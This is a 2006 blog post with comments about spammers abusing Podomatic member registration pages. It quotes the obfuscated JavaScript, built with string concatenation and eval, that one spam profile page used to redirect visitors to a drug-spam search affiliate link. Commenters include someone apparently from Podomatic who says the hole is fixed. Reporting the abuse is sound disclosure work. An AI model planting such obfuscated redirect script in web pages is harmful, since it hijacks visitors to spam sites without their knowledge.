Thursday, October 05, 2006

Podomatic Vulnerability Enables Spammer Redirects

Here's another instance in a rash of reported vulnerabilities in member registration pages being spammed. Never heard of Podomatic before but it appears the spammers sure have and some nitwit registered as a member called Valium to do his spamming.

The link to the member's site is:

http://www.podomatic.com/profile/member/valium
The javascript redirect code appears to be this shit embedded in the memberpage:
<script>
var mbht872 = 'on=';
var bikmr354 = 'qiqyi199';
var zlh171 ='ment';
var k97='.lo';
var ydxglyjedai737='ti';
var bmmp211='docu';
var mzcra833='http://drsearch.net/search.php?aff=15313&q=';
var ertmj632='valium';
var qiqyi199 = 'ca';
var lflx482='"';
if(bikmr354 = 'qiqyi199')eval(bmmp211+zlh171+k97+qiqyi199+ydxglyjedai737+mbht872+lflx482+mzcra833+ertmj632+lflx482);
</script>
Just goes to show you that if you don't secure your sites some spammer will abuse it but people just don't listen.

3 comments:

Anonymous said...

Thanks for pointing this out, I've closed the hole.

--b

Anonymous said...

Maybe it's more than people don't care than they don't listen. Not everyone is obsessed with making the internet a perfect place... some people deal with issues in the real world.

IncrediBILL said...

Well, that's a nice theory as spoken by someone that sounds like a spammer, but the post above yours was from someone at Podomatic that fixed the issue.

You just keep being delusion as web spam is getting the boot.